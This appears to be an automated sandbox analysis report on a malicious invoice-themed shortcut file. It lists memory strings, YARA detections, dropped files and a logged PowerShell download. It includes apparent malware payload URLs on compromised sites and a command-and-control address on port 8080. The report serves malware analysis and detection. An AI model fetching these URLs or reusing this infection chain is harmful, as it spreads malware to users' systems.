                    Source: powershell.exe, 00000002.00000002.302120450.00000166F7BE0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526984959.0000000000886000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.528849751.000002E1BD862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.527892200.000002B983F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 00000002.00000002.302723143.00000166F7EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                    Source: svchost.exe, 00000010.00000002.528849751.000002E1BD862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: regsvr32.exe, 00000009.00000002.526788153.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: regsvr32.exe, 00000009.00000003.363631945.0000000002961000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.363832246.00000000029C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.527556670.00000000029C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.363699688.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.9.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: regsvr32.exe, 00000009.00000003.363070346.00000000029D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.363141507.00000000029DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?89cd6d0e97a58
                    Source: regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabp
                    Source: regsvr32.exe, 00000009.00000002.526890545.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?89cd6d0e97
                    Source: powershell.exe, 00000002.00000002.298293260.00000166E07FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mandom.co
                    Source: powershell.exe, 00000002.00000002.298089858.00000166E07D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.298208653.00000166E07F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mandom.co.id
                    Source: powershell.exe, 00000002.00000002.298293260.00000166E07FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mandom.co.id/
                    Source: powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mandom.co.id/assets/TpIIt7SmNBsWCECLoHrS/
                    Source: powershell.exe, 00000002.00000002.298089858.00000166E07D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mandom.co.idx
                    Source: powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://marmaris.com.br/wp-admin/2cfpSuAH/
                    Source: powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://masidiomas.com/D4WStats/GAhmgvhLgUn6/
                    Source: powershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pacemaker.cd/images/Xc/
                    Source: powershell.exe, 00000002.00000002.294144175.00000166DFDF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.293436051.00000166DFBE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.294144175.00000166DFDF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: svchost.exe, 0000000B.00000002.327213021.000001FF4B213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yamada-shoshi.main.jp/yamada-shoshi/V61hH/
                    Source: svchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                    Source: svchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                    Source: regsvr32.exe, 00000009.00000002.526839029.000000000084B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526658997.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                    Source: regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526839029.000000000084B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526658997.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                    Source: regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/t
                    Source: regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/tem
                    Source: svchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                    Source: powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bpsjambi.id/about/VPe69A9Tk/
                    Source: svchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                    Source: powershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 0000000B.00000003.326297675.000001FF4B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327411940.000001FF4B26A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 0000000B.00000003.326501558.000001FF4B246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327266562.000001FF4B24D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 0000000B.00000002.327259328.000001FF4B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.326535383.000001FF4B240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 0000000B.00000002.327259328.000001FF4B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.326535383.000001FF4B240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 0000000B.00000003.326535383.000001FF4B240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 0000000B.00000002.327266562.000001FF4B24D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: powershell.exe, 00000002.00000002.294144175.00000166DFDF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 0000000B.00000002.327213021.000001FF4B213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 0000000B.00000003.326530278.000001FF4B256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 0000000B.00000002.327240023.000001FF4B23A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 0000000B.00000003.326501558.000001FF4B246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327266562.000001FF4B24D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                    Source: unknownDNS traffic detected: queries for: mandom.co.id
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006B24 InternetReadFile,
                    Source: global trafficHTTP traffic detected: GET /assets/TpIIt7SmNBsWCECLoHrS/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: mandom.co.idConnection: Keep-Alive

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 6.2.regsvr32.exe.1de0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.730000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.730000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.regsvr32.exe.1de0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.302284085.0000000001DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.528233629.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.302481665.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.526430630.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Source: Rechnungskorrektur 2022.20.05_1305.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 1192, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUSJump to dropped file
                    Source: Rechnungskorrektur 2022.20.05_1305.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
                    Source: Process Memory Space: powershell.exe PID: 1192, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\UjKMhzOwg\Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFF7F071EE0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E12B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E4A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E53FB
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E6850
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E443C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E5CAD
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00007FFFE21E5E01
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_01DD0000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180006414
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180005C74
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002ACE8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024104
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020118
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000359C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E99C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025A4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002B7B2
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180023C14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002582C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000B834
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000403C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021444
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012044
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016054
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001705C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001870
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180014484
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BC98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008C9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800078A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F0A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E4AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800048B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ACB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800090B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800270C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800024C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800280C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800050D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800234D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800150F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A10C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028D10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A524
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008134
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022140
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180006954
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F554
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002B564
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012168
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013568
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024570
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019178
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025180
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001980
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021588
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A988
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018190
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013994
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028998
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800061A0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800135A6
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016DA8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800135B4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C1B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800025B8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800085BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800015C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800295C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800229CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E5D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A5D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800261E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800079EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180023624
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017638
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E3C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020E40
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015A64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015264
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A26C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007678
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001667C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012680
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001E88
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000968C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022290
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000529C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020AA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022AAC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007EB4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800162BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800252C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AEC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F6DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002ADC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E2F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016AF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000DEF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DEFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180006308
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001370C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004B18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015F24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180006B24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F328
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021738
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002AF38
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028348
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000DB4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180014F50
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000B350
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008370
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015774
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026B98
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001CF9C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001B3A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D7AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800053B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FFC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800173DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018BDC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00720000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006414
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000C819
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180019628
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025A4C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180012864
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180005C74
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800252C0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006B24
                    Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006F2C
